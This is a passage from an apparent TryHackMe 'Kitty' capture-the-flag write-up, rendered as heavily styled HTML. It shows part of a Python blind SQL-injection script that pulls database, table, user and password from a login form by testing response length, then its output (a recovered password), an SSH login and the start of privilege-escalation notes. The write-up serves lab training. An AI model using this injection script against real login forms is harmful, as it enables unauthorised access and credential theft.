style=\"color: #C3E88D\">&#39; and password like BINARY &#39;<\/span><span style=\"color: #F78C6C\">{sub}<\/span><span style=\"color: #C3E88D\">%&#39; -- -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #82AAFF\">format<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8; font-style: italic\">sub<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">password<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">tb<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">table_name<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">user<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">user_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\tdata <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t    <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">username<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> query<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t    <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">123456<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\tresponse <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> requests<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #82AAFF\">post<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #82AAFF\">url<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #BABED8; font-style: italic\">headers<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">headers<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #BABED8; font-style: italic\">data<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">data<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">allow_redirects<\/span><span style=\"color: #89DDFF\">=True)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #464B5D; font-style: italic\">#print(&quot;Size of Response Content:&quot;, len(response.content), &quot;bytes&quot;)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #82AAFF\">len<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #82AAFF\">response<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #F07178\">content<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">618<\/span><span style=\"color: #89DDFF\">):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\tdb_name <\/span><span style=\"color: #89DDFF\">+=<\/span><span style=\"color: #BABED8\"> elem<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\ttable_name <\/span><span style=\"color: #89DDFF\">+=<\/span><span style=\"color: #BABED8\"> elem\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\tuser_name <\/span><span style=\"color: #89DDFF\">+=<\/span><span style=\"color: #BABED8\"> elem<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\tpassword <\/span><span style=\"color: #89DDFF\">+=<\/span><span style=\"color: #BABED8\"> elem<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">break<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">elem <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> probe<\/span><span style=\"color: #89DDFF\">[-<\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">]):<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">\\033<\/span><span style=\"color: #C3E88D\">[K<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">database:<\/span><span style=\"color: #BABED8\">\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> db_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">table:<\/span><span style=\"color: #BABED8\">\\t\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> table_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">user:<\/span><span style=\"color: #BABED8\">\\t\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> user_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password:<\/span><span style=\"color: #BABED8\">\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> password<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\tstate <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #F78C6C\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">elem <\/span><span style=\"color: #89DDFF\">!=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">\\n<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">):<\/span><span style=\"color: #BABED8\">\t\t<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">database:<\/span><span style=\"color: #BABED8\">\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> db_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">end<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">\\r<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">table:<\/span><span style=\"color: #BABED8\">\\t\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> table_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">end<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">\\r<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">user:<\/span><span style=\"color: #BABED8\">\\t\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> user_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">end<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">\\r<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\t\t<\/span><span style=\"color: #82AAFF\">print<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password:<\/span><span style=\"color: #BABED8\">\\t<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\"> password<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">end<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">\\r<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>This will take some time to finish.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ python3 db.py                                      \n\ndatabase:\tmywebsite\n\ntable:\t\tsiteusers\n\nuser:\t\tkitty\n\npassword:\tL0ng_Liv3_KittY\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">db.py<\/span><span style=\"color: #BABED8\">                                      <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">database:<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">mywebsite<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">table:<\/span><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #C3E88D\">siteusers<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">user:<\/span><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #C3E88D\">kitty<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">password:<\/span><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #C3E88D\">L0ng_Liv3_KittY<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Once we get the password, we can connect to the machine on SSH as user <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><em><strong>kitty<\/strong><\/em><\/mark><\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ ssh kitty@kitty.thm\nkitty@kitty.thm's password: \nWelcome to Ubuntu 20.04.5 LTS (GNU\/Linux 5.4.0-139-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n System information disabled due to load higher than 1.0\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n\n0 updates can be applied immediately.\n\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Tue Nov  8 01:59:23 2022 from 10.0.2.26\nkitty@kitty:~$ \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">kitty@kitty.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty.thm<\/span><span style=\"color: #FFCB6B\">&#39;s password: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome to Ubuntu 20.04.5 LTS (GNU\/Linux 5.4.0-139-generic x86_64)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\"> * Documentation:  https:\/\/help.ubuntu.com<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\"> * Management:     https:\/\/landscape.canonical.com<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\"> * Support:        https:\/\/ubuntu.com\/advantage<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\"> System information disabled due to load higher than 1.0<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\"> * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">   just raised the bar for easy, resilient and secure K8s cluster deployment.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Expanded Security Maintenance for Applications is not enabled.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">0 updates can be applied immediately.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Enable ESM Apps to receive additional future security updates.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">See https:\/\/ubuntu.com\/esm or run: sudo pro status<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">The list of available updates is more than a week old.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">To check for new updates run: sudo apt update<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Last login: Tue Nov  8 01:59:23 2022 from 10.0.2.26<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:~$ <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h3>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Things I always try first when trying to escalate privileges on a Linux machine:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Run <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">sudo -l<\/mark><\/em><\/strong> to find if our user is in the sudoers group and can run any binaries as root (kitty is not in the sudoers group, unfortunately)<\/li>\n\n\n\n<li>Find SUID binaries (Nothing interesting found)<\/li>\n\n\n\n<li>Run <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">linpeas <\/mark><\/em><\/strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-black-color\">which did not reveal anything interesting either<\/mark><\/li>\n<\/ul>\n\n\n\n<p>Checking for the open ports that are listening locally on the machine, we found some ports.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" 